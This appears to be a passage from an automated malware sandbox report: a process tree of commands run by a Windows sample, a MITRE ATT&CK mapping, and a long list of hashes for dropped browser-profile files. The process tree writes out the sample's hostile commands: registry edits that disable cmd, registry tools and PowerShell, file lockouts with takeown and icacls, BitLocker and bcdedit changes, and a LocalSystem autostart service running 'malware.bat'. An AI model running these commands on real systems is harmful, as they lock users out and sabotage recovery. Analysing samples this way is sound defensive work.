reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoControlPanel /t REG_DWORD /d 1 /f
2⤵
PID:3248

C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoExplorer /t REG_DWORD /d 1 /f
2⤵
PID:4924

C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows\PowerShell" /v "EnableScripts" /t REG_DWORD /d 0 /f
2⤵
PID:5852

C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows\PowerShell" /v "ExecutionPolicy" /t REG_SZ /d "Restricted" /f
2⤵
PID:2216

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
3⤵
PID:5756

C:\Windows\system32\reg.exe
reg add "HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\AlternateShell" /ve /d "Empty" /f
2⤵
PID:1472

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
3⤵
PID:4968

C:\Windows\system32\reg.exe
reg add "HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal" /ve /d "Empty" /f
2⤵
PID:6112

C:\Windows\system32\reg.exe
reg add "HKCU\Software\Policies\Microsoft\Windows\System" /v DisableCMD /t REG_DWORD /d 2 /f
2⤵
PID:5272

C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableRegistryTools /t REG_DWORD /d 1 /f
2⤵
PID:5196

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ipconfig | findstr IPv4
2⤵
PID:1664

C:\Windows\system32\ipconfig.exe
ipconfig
3⤵
- Gathers network information
PID:4200

C:\Windows\system32\findstr.exe
findstr IPv4
3⤵
PID:5520

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c whoami
2⤵
PID:5704

C:\Windows\system32\whoami.exe
whoami
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:3652

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net user "YCLEXTAL$"
2⤵
PID:5412

C:\Windows\system32\net.exe
net user "YCLEXTAL$"
3⤵
PID:5204

C:\Windows\system32\takeown.exe
takeown /f "C:\Windows\System32\notepad.exe"
2⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:4848

C:\Windows\system32\icacls.exe
icacls "C:\Windows\System32\notepad.exe" /deny Everyone:(RX)
2⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:5160

C:\Windows\system32\manage-bde.exe
manage-bde -off C:
2⤵
PID:1768

C:\Windows\system32\manage-bde.exe
manage-bde -on C: -exclude "C:\Windows" -exclude "C:\Users" -exclude "C:\Program Files" -exclude "C:\Program Files (x86)"
2⤵
PID:5544

C:\Windows\system32\bcdedit.exe
bcdedit /set {default} recoveryenabled yes
2⤵
- Modifies boot configuration data using bcdedit
PID:5872

C:\Windows\system32\bcdedit.exe
bcdedit /set {default} bootstatuspolicy IgnoreAllFailures
2⤵
- Modifies boot configuration data using bcdedit
PID:1904

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
3⤵
PID:5600

C:\Windows\system32\sc.exe
sc create MiServicio binPath= "C:\Users\Admin\AppData\Local\Temp\malware.bat" start= auto obj= "LocalSystem" DisplayName= "Mi Servicio"
2⤵
- Launches sc.exe
PID:708

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
3⤵
PID:5520

C:\Windows\system32\net.exe
net start MiServicio
2⤵
PID:5684

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 start MiServicio
3⤵
PID:1912

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
- Drops file in System32 directory
- Suspicious use of SetWindowsHookEx
PID:5844

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious use of SetWindowsHookEx
PID:2336

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious use of SetWindowsHookEx
PID:2444

C:\Windows\regedit.exe
"regedit.exe" "C:\Users\Admin\Desktop\ExitComplete.reg"
1⤵
- Runs .reg file with regedit
PID:5372

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

System Services

T1569

Service Execution

T1569.002

Persistence

Create or Modify System Process

T1543

Windows Service

T1543.003

Privilege Escalation

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Create or Modify System Process

T1543

Windows Service

T1543.003

Defense Evasion

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

File and Directory Permissions Modification

T1222

Impair Defenses

T1562

Disable or Modify System Firewall

T1562.004

Disable or Modify Tools

T1562.001

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Inhibit System Recovery

T1490

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
Filesize
152B

MD5
c9c4c494f8fba32d95ba2125f00586a3

SHA1
8a600205528aef7953144f1cf6f7a5115e3611de

SHA256
a0ca609205813c307df9122c0c5b0967c5472755700f615b0033129cf7d6b35b

SHA512
9d30cea6cfc259e97b0305f8b5cd19774044fb78feedfcef2014b2947f2e6a101273bc4ad30db9cc1724e62eb441266d7df376e28ac58693f128b9cce2c7d20d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
Filesize
152B

MD5
efccc7faf9d35f6829425651cf800edd

SHA1
0d7ada221f33b53d7d6a3671ffa9f3532694f1fe

SHA256
1fc2038b3cc76c3889043ea19543733a2f20387f340a371ae2027460e9c3a090

SHA512
0dbbd194c34f16a7355d93cdc47c646947e5d4671dc8931b364e1f42493c5b664a2d3b802663479eae3e26b17a4991f6600711593a54863d9b00d8e75552eafd

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
Filesize
152B

MD5
4dc6fc5e708279a3310fe55d9c44743d

SHA1
a42e8bdf9d1c25ef3e223d59f6b1d16b095f46d2

SHA256
a1c5f48659d4b3af960971b3a0f433a95fee5bfafe5680a34110c68b342377d8

SHA512
5874b2310187f242b852fa6dcded244cc860abb2be4f6f5a6a1db8322e12e1fef8f825edc0aae75adbb7284a2cd64730650d0643b1e2bb7ead9350e50e1d8c13

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\data_0
Filesize
44KB

MD5
e874a18e144abad80f84b0ce0a850cda

SHA1
c9fcf7a77a1d8d6e4aeded1f9dee73812aa4d7b6

SHA256
d0fae510fa37af635b5025554c748cbbbc046f3b08644114f9f6037d1559fb4a

SHA512
6f1dcbbd8474bc3cfdbc48cc7dbff0765449012071d0d5f3bd1079ffaf63375710ede72653a445f6a38a126b74e335936d622f613dcd47064e6a0df1a92ab9ef

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\data_1
Filesize
264KB

MD5
62f5153e0d2cd98c45f6b6ce74440d4a

SHA1
a66c21d4c26efd2f2c2b2a8d52be3be883179122

SHA256
9b4c402723307f8bdac940365678b3c7b674aad246c4df75f33828a5562d62ee

SHA512
e0404578a7f6e97e119b530d9a4d947c34eace8f00f2def930ac4acedfcb1975efc76d443c68818d5a481b51da9dc4cfef2847476b29d27c01827635103837a3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\data_3
Filesize
4.0MB

MD5
daee3b856479fc5b0545a2419faf9a3b

SHA1
491f71026ef1c229c53fe1ac49b5b450b38f88de

SHA256
e9dd423e8e8fd20eecc215368bc367c772fac546a886447844f75b4c30d3da76

SHA512
8559237c349bda3304267b4df1fc932e9b1f42e033b51d4024ad3f356e560e7801dcc3d49ce930d1e192d6050196b576781e50c28d9d3f2c6f3b1e16fd8761ad

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index
Filesize
96B

MD5
fdfa568e4c7e2dc9a376df28b80ffdac

SHA1
92ab016cc47dee1efe945ab2abc7f9dc88d52d2f

SHA256
2a0ec4667ea752c7dd5433350330db80a17541a9cb2de5658f534ac2b86ebbf0

SHA512
a1c43a9a87cc5d201b0fafaa7ca06294b8a54b37f882d66fd3d4ebaaba70e9e7f61e5044a39735aad5a37c6ea37fdf3f1635a885842545f434d2b542097ae0e0

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index
Filesize
72B

MD5
c84f921704a54366b00f87e147e96f17

SHA1
4d494f443e375ac012eb82ddaab1b58ff37f685e

SHA256
45ffef33af9b503c91b32b33217ecd6126fd5d69a23965ad7e6d147f09dcb947

SHA512
6a9be66b005fbf388cd953b100c4b72d5094e0c81ce914ed9878bafbef02a72a4989e2b03f4c3b4eac92b73c8b15bc04c2814674beab910620bf5dd316f4ec1d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies
Filesize
20KB

MD5
32162557a2897e234bfd98f10e3ff2f7

SHA1
4824ed7180691a2ed71ec6cdcec72ba91b14644a

SHA256
750c65316cc6caf34662d5a198a5c6b923a36f0f163828ae19f1711d6786101f

SHA512
c5b1c8d4a3ee419db109598365347005805030cd0f87705b8646aedb07994d034eb3483ccf3acb444e4b524c0a64d8331861bbd827e3440df5eb3321ddf0c370

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extension State\LOG
Filesize
322B

MD5
cd64e2723d14ba0fd84e38759c5252bc

SHA1
5a32fa68be97533eabcf8daeade3fdba473fa905

SHA256
85d1678b2e4edf3f884dda99e7239bd35d4a70081239a91bcf1280c0f4490e05

SHA512
7aaf6148b87d1c427b248e4372342686a05a36b13231e2c5e56ad75b7ee8f093dba1184e6337d919141ac6cb8d53b954244db2f38e9afd224e694464c23a0d1d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\GPUCache\data_1
Filesize
264KB

MD5
982893abdf13b4ec8632c10a09d45172

SHA1
1ffba5041436e13caef028d298521247f1d69de4

SHA256
253c89648ab906908d19069ad2978c64b8e3af5d7fe3dfa7dfb9f934f464e45f

SHA512
9c7b5199ac28dcebc4707db88ab520db5c01bc17c8a4e648dd7d8b3d7ccd89c3808e9178ef8277461a206915a5404de6b15590588cf882f812a23e3c86805749

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\History
Filesize
124KB

MD5
09a951e1041e79921081ffc272d75575

SHA1
1429b12822baae80d85f0598bbc56bf59decd25d

SHA256
16b91877572be2da8a2c4be72217782122a6133cee58621081a7151c32105487

SHA512
6521d9097976e8babc44bcc55b752a100ed7f4501ca47011f5585175ea816d12ac09825c4858ae52e70c6cd2f0045d7dc4705a3050e14416def0019e116e3496

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\History Provider Cache
Filesize
804B

MD5
325c81b304b78d7c2690ff789d59f4d3

SHA1
3ff6599574aebccd713aad7074be14e7e9dbc6b9

SHA256
9d65fa6dfa2e7784c52ecab340cbe240afcec1d46306a27896ace7b962cfb416

SHA512
796120efc9c20d15cd571b1aba321c0f17cf5c5f48140eca9fead75ff97dcc8652f2e9e1b1ccd0db8f4e2d678fea2bcf22d77991d07306198fb7933fbe739753

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\History-journal
Filesize
20KB

MD5
50cbdaf407afb94ca0facb2010893c9b

SHA1
30b31666e7a130829c32e3b3406fdeb616373ceb

SHA256
7f4c482db59fa3b4511a004a2eb33c0e6cf3ae660943be5fa182bded4c2fca25

SHA512
b1d83dca8abddd7ce03c790588929376b296f38cf8fa517855ea882418f9e7c0c38f629e5e19a1ca0b6cf88fcefbe6c219b1344e0958076ce61cdc66be6aed74

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb\LOG
Filesize
334B

MD5
5f3f634db7d25da1ed4cf98f1b62616a

SHA1
38a953ddc262f3bcdfafdeb9bfa56512afe327bc

SHA256
62cf18feb1f690e0cd6495eeefaf0c6a3e86173c3e587ecfecc3a94964650cb1

SHA512
e7c8464a50ade60bfa68c3c169492a88c01fe964ffe06fa723203a2d77115fd77448ea4cd1bf49e05443f45738036a4e23a113e675b0752dd5d9f7b3809bb3a5

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Action Predictor
Filesize
36KB

MD5
cf4b0a74bdc68a111bd7ccbd8569daa5

SHA1
e567e83b8db5476018dfed63802d0f60690c8139

SHA256
f79fc9fca22eace1d33311f380f135b75b30baa639f2d819fa437580ef268b6d

SHA512
4ffda967282821d319e22334cc4410eb8883b436654c2ffa65a7a75fdac296a349a672c734e8fed023b9b34d5f17d1af611f81d433108f898459b5ae412dac9f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
Filesize
6KB

MD5
6805a029aa408017e0f75fcc43a0f427

SHA1
9d82b733293379d2aaf08d584f7b5d4277be1ee6

SHA256
0b6fad0c6c668865cccd568dc09b385c3175152bf2f1f0f58076e170df5cdca3

SHA512
4d70268ee9370d3d7cc3a997ee779f836d13d44498a30763548b9b6d9004e50d1fef8dafd66612983adf1c9ba132c827a3e085b64e7bc848dd522f3144b74501

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
Filesize
5KB

MD5
e21124767d3ed09b0e8e5463807aa59c

SHA1
7b26599505aada13f2254520afe3741c1bb0c0de

SHA256
0bed56ea7482ed14a95f3ebbd13b56d12f474bf4b96ba2a060753ce3da8a8c6e

SHA512
13a1354bf4bc51de034049983130eb64946ecb46873613746cd934d0761ea79a27c2745b242b7dbeff768b225faa577aafc8aaa4a9905183fc8bb1d0596c6abe

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
Filesize
6KB

MD5
901a1076eefc08aaf4d12e1627c48376

SHA1
fdf169cd35a3de9130a2cce003f1cf8a7759982b

SHA256
a25b769e567037f6c2ba69ace18960dbd5bdec73696629779d121e9f34decd10

SHA512
577e808ceca33600a331dbe9c41085118bb89315c5e09c2862dbecab116564778a0537749c49be797bd286d67ebf2fe81f15fdf1056d2a2c5eb8907ce787f910

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
Filesize
6KB

MD5
68cb7abcfaaea97c5b7a003b11b2d054

SHA1
e965aa9b0461f74a12d4897b8235ed2a2fffbc4e

SHA256
2c1d44151befa0b33d4bf93a3f1f668976ed2089944ef61f6e486ed7606ecd89

SHA512
280bfd712dd55913100e919bf396766a080c77c1d3f5b949bc78193c40d51574d69fbe7426473c69f2f261773583488c41ffc17ec44914e75e383f1c6446dc7b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
Filesize
6KB

MD5
d89beb5ba662fee38c6d6a2cd333263b

SHA1
07e775c85610c6d5eb143afd731fd9ddaa94ce72

SHA256
867cff30d3e96fff36e34b9dff42420a1a7223e0883776057076eba6b4125062

SHA512
cd43e30a8d02fab05646f0dba67e7119c5c14b60763c96a627bf0956456040fc7f4139c482aa1ea679ac4bf6665332924db960deeaa7565405aaa8216162d2f2

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
Filesize
7KB

MD5
1d53d7b50e841274c637a20a544b1358

SHA1
0d9e83dccd8d784f9214e01b5d2e6b55ad6c6443

SHA256
0f3d8ed8b903fd484ddddb9c91344b2b88c51be80137ba5e11065fbd04b804a2

SHA512
36ae7c18634464dffb9f575875d1a8b49518bc5867260a60254fc47395a7e8a279c54cb3786af96012b6f2d5ab2e73ef3887384451c13c74dd721c99be54c5fa

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
Filesize
7KB

MD5
4acec5149eb5c76bd01ac0ca754d9cbc

SHA1
ce55416f50caf2c1140dfb8d95ad1ee41239156a

SHA256
f707ac4907ca2f2c413984e39c44699a6252a2cc851f20ca0e57bf3761c534ec

SHA512
520ece2659965e28de095ed1864adf51ef4d7d3f048f494cd1a61ad96c367573a2a8326443f0d237f86a844ca3cd1ee93bf9491ce3954edff3d6939eb6804505

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\PreferredApps
Filesize
33B

MD5
2b432fef211c69c745aca86de4f8e4ab

SHA1
4b92da8d4c0188cf2409500adcd2200444a82fcc

SHA256
42b55d126d1e640b1ed7a6bdcb9a46c81df461fa7e131f4f8c7108c2c61c14de

SHA512
948502de4dc89a7e9d2e1660451fcd0f44fd3816072924a44f145d821d0363233cc92a377dba3a0a9f849e3c17b1893070025c369c8120083a622d025fe1eacf

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage\000003.log
Filesize
213B

MD5
046cc08d163fc4578cd1b77a5d0965ac

SHA1
92f503e605c30974baf385f1619f1269b81dec57

SHA256
693a60684aa9ff4f01cb6027e9c938f4701c0c898afc224a0776cb1e18e87166

SHA512
e8b1df36a237bcbbad897146ca247edf75466b2a4030fec620c46932b5c31137f2931cd2758534e4308aed3fb9cc40edf2d7646a38530bcc5e6d7069c19a3b1f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage\LOG
Filesize
322B

MD5
6cfe76389492616226eec1ef5c93f670

SHA1
779b1cb38c67716b53c1bbb7b8675bc4d1a2c401

SHA256
d09da5c5319c5309924a46527f9b7ad0ac57909d68a41c04a4faa9b534faf76a

SHA512
70903102111e451961d2b76223dc7c57f728b1e5dbbb9268434496c91baf498b144b6a22b746cabf6666cd35f837db9f7f0114ad0389f0da5182d52165d32ae4

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Sessions\Session_13360607723244648
Filesize
2KB

MD5
0985a86600accfef7bca94b2c1a1f307

SHA1
1e2939703ff89d4c601b790630b8b06a18d8eb69

SHA256
1da516e0c9380326af14db143133a2d13e01b64cd937c0fa5b9ee2fb0c60b0d0

SHA512
79879ca965ef0717707a5283d6c2cb86cffb759f1d1884ee11af538ec441ef9d82b3bb89577b8b4fb6dc9e4bd05103c3b2f829496643b3012145e567ed742e3b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Sessions\Tabs_13360607723415648
Filesize
2KB

MD5
524af9e1a1b4eded0bda6a5f55e985e3

SHA1
78c58cb66bb281ff99814d50b1c7d68318c43338

SHA256
b00f29b8645456cfae5206b26cce0d28421da3eb7b17f4697c6c33785e73181f

SHA512
bd1cee86e200bd402ea18e24d84b7ef3a21a91f7cd0b101202859cf5ce74eba0e445513548deb8919bf5e5bfb6d56d492e2574647cb83195698d844592609266

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Shortcuts
Filesize
20KB

MD5
fca621466ede4c2499ecb9f3728e63ab

SHA1
3d5d4cd0fa702371f9d1a40e72e1fe19d194a3c4

SHA256
c6dde84fb40fb69d1a6637fe6bf781de51a4c24e45b616e8f97afd3c6fe200b8

SHA512
aa12ed8c1ff85af4375ac80d7fe494d6f8a70ddb3357c186a0c1ade9bbcc3efc3de5fb0ad4b81eb2ab9bc916b6adf8b76c30203f78e38cd00af5fa4ccf3e3760

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database\000003.log
Filesize
112B

MD5
932788bec7161a164875f2c4983cc7be

SHA1
ecd075074470615b3c22da7b5278ce3817e70dff

SHA256
91f6cd2309f3d03698be878a0aa4e4cb41ace0e191830bd877fb1f1f9c6a7757

SHA512
937fde7edec478460ecf814ee7597fe2c16833087197625a81b89013b5dc6d05bd9f5643a8f5aa0ca9c69f4b4755e4537f2127aad1a63c09542658f1bde72fd5

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database\LOG
Filesize
347B

MD5
541c6a6386686313f08cdfc27912155a

SHA1
3feff2bafbc294317bae64560537d40101f42e30

SHA256
1168416c77a25e7d5895a2ce0cf97ecff02ad5014231eb74b80550b0da646762

SHA512
c508662846587edeacc2d9ffc4628febe6e52358699a614659136599ba814f49ec3d291b46e4c96a0551335709bdf153c66ba6d20002fda205620e8811fced33

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB\LOG
Filesize
323B

MD5
b23fd064cf85c9c564ada42515433c8c

SHA1
3268faba94f2fe480a76f262bfcac3ee24f0820a

SHA256
58a7cd876754bc92d9e17f0707bb0e3d1ef95ef0d30660fc6f9b840478bbc906

SHA512
03b870590d55ed88746e7ce8e7e831efcdd63108545fe5228491fded20f80421e26b528365c14a1dec8855f1cbe8644fba1e7c5df0ad3a354eea0efd8bc6ec52

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Visited Links
Filesize
128KB

MD5
12b09d513c3553b426409a7d35ea6e4d

SHA1
1cd1f7f404ab150a6474647e0a623d7dc187bc42

SHA256
94cabeb5424f36c8784a85d6634cf85decffe1b6fb3afa9ba55652d2294d9403

SHA512
3ccb2d8e12c698a3d751c3cb0c04fed470d1abfcafe6269f3f4ecac73eb91b374588747055b57ae3152bc4cf91749fbf5638b3d2dacf84eba9b4209a1c89eccb

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT
Filesize
16B

MD5
6752a1d65b201c13b62ea44016eb221f

SHA1
58ecf154d01a62233ed7fb494ace3c3d4ffce08b

SHA256
0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd

SHA512
9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT
Filesize
16B

MD5
46295cac801e5d4857d09837238a6394

SHA1
44e0fa1b517dbf802b18faf0785eeea6ac51594b

SHA256
0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443

SHA512
8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT
Filesize
16B

MD5
206702161f94c5cd39fadd03f4014d98

SHA1
bd8bfc144fb5326d21bd1531523d9fb50e1b600a

SHA256
1005a525006f148c86efcbfb36c6eac091b311532448010f70f7de9a68007167

SHA512
0af09f26941b11991c750d1a2b525c39a8970900e98cba96fd1b55dbf93fee79e18b8aab258f48b4f7bda40d059629bc7770d84371235cdb1352a4f17f80e145

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\LOG
Filesize
198B

MD5
281c4a05c6fc550f6966c77f420d642a

SHA1
e4d5aeb78cba26a2cc7333017f0e626a86ce28ed

SHA256
d8a49db3a6bdb38d97e3b83dcb487b5ff4fb7ed155965a871e2de6cf3341a1f6

SHA512
2cb21293fc60a2d7f67b9d2782bd67f712351e57593f0124e597016c79ba4e6ad97aff86868ef0dbde5006d60cac2a623cc2b0fcb60dca95f5e31c35ef0e08bd

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\MANIFEST-000002
Filesize
50B

MD5
22bf0e81636b1b45051b138f48b3d148

SHA1
56755d203579ab356e5620ce7e85519ad69d614a

SHA256
e292f241daafc3df90f3e2d339c61c6e2787a0d0739aac764e1ea9bb8544ee97

SHA512
a4cf1f5c74e0df85dda8750be9070e24e19b8be15c6f22f0c234ef8423ef9ca3db22ba9ef777d64c33e8fd49fada6fcca26c1a14ba18e8472370533a1c65d8d0

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\heavy_ad_intervention_opt_out.db
Filesize
16KB

MD5
9e02552124890dc7e040ce55841d75a4

SHA1
f4179e9e3c00378fa4ad61c94527602c70aa0ad9

SHA256
7b6e4ce73ddd8b5e7a7c4a94374ac2815d0048a5296879d7659a92ee0b425c77

SHA512
3e10237b1bff73f3bb031f108b8de18f1b3c3396d63dfee8eb2401ce650392b9417143a9ef5234831d8386fc12e232b583dd45eada3f2828b3a0a818123dd5cd

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\load_statistics.db
Filesize
44KB

MD5
ccca2994b90655bf2ee1bd25fca169a4

SHA1
ca9c47746d132ed938774d32ec6b41ec8a92dc6f

SHA256
968d1343c07de4330c9ade0ceed37cd1358ae3b70389e3af1661ecef49708e46

SHA512
5f48dc04ba45d71755caf16e488ac1bada4559e80ad60eb6fd14e472a5e8578e10bf257fbb1736e5ffa6e5017d20c530a398e79034fd4feeb5b012dfca66b15d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\000003.log
Filesize
187B

MD5
554a6e7c521b6a2b4d5591e3d0b4144e

SHA1
8677036506f69e43c850424d36ee1c946c392455

SHA256
14dd0165b47130ab0ca1aedae5b7bb6756868929c1956925107006290c0aaef5

SHA512
dc0140ff62da5471867e82a4c627a00618f9755b4417de18bcf64c3b18d3e20abefab2d5a04d18f67a55083221b0d1c8198dd82fbb7691ce491dfc1feb849ebb

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\LOG
Filesize
322B

MD5
e09b50cb1e647da2d7b07ef5911d4302

SHA1
2d8c5bcfe945edb2903f599d92ac695989014fe1

SHA256
5e5c2ea2adc3d97a374d7c7ec6f14daf8975814e2ab355eefd029256e771b282

SHA512
1332308aa359f217ebdc9e3948fd28f64e647922989f4f99e7c0ba2fe1e29c916281e24994779ce953dc05907a03eb58b89a092ffa59ec27193af1d91763d112

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata\000003.log
Filesize
594B

MD5
e8dca28673e03790be4e9dd4bc78349e

SHA1
01052ea3656eed306a447f5f33e9262e6be6cfac

SHA256
d2fabf0423a1afee07464615d4e7b400dd23fe04b8bb52639e53c3ae57ffda10

SHA512
0e7952e12375cba5b7a8e3abf4a879076aca20c9af25e930148b6f611db696fb4003b3d48d5de07b1972685c109c094d39d46ef8442d58ae1177e56285f492da

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata\LOG
Filesize
340B

MD5
ca78ff1e381341c74670b20495bf057d

SHA1
75d329f23db5bb7c95222fd5578fcb075d87dbb2

SHA256
14b4fcb4d91e7055d09914cc3bf37f3a48f29e8695f91a1ac8cfd7dd2403b924

SHA512
3f29a2266da632bd1bbf322e5ec1a7d745e3f1182b3b053b770765050cdfe59b08e8f8b11addff236a13d5bbb8c6f77343f1c1abc39f76db518b34d749374a16

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\GrShaderCache\GPUCache\data_0
Filesize
44KB

MD5
5a0ab3734ecf3f60527848356e4ed5c8

SHA1
92997031cb781d6cc8328369674947b7ea0c05d3

SHA256
bc6a6690bce150bafeeea150d293b3f112fa8c8106040a0d388aa8d4c6f8ba7f

SHA512
a0fad4f27b16f3d61b9d9f78491f743275ed1ec17f0c2e872bccfec0fb144255943269ba22546269575832c56385f65d663bc020a4c444acdcc601748dccde7e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\GrShaderCache\GPUCache\data_1
Filesize
264KB

MD5
0f763835dc54e95472101be940b66bfb

SHA1
a8708da39d976c369a0b4f1d9b44d98853e2ab1e

SHA256
2cc3a528a09b336ddad629217d7130d222a5f4386554ee6e96636fb6e2ec0a7d

SHA512
ed0430bc43da8deb3ddbf8633f5ccda45e493667ca03be506b1b19bc584583b9e0dc24ab5c96b4e89bf4906bffadff77df9a96dc48e9e79575d3fc56ba0abaea

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\GrShaderCache\GPUCache\data_3
Filesize
4.0MB

MD5
20a0586e63839e4314261ca1b9039f2e

SHA1
b39d8fdad6c761ac7ae3c6edd6cfd6c5bb2674ea

SHA256
9fa3b14d1df07cd2198821d9efc9fb169f2818f3971d841d130488adfe455e75

SHA512
243d699f6a64a2ebc9b5e924188364e27abfc3623c02ca214bc2775d12283e9704b669d600039e35cb09ac0f5d3da8ec264e8d5e8ac8b2c3e7d74215f83d04b7

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Last Version
Filesize
11B

MD5
838a7b32aefb618130392bc7d006aa2e

SHA1
5159e0f18c9e68f0e75e2239875aa994847b8290

SHA256
ac3dd2221d90b09b795f1f72e72e4860342a4508fe336c4b822476eb25a55eaa

SHA512
9e350f0565cc726f66146838f9cebaaa38dd01892ffab9a45fe4f72e5be5459c0442e99107293a7c6f2412c71f668242c5e5a502124bc57cbf3b6ad8940cb3e9

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
Filesize
11KB

MD5
e07f54e4a57316ba329f39ed36ce6cfb

SHA1
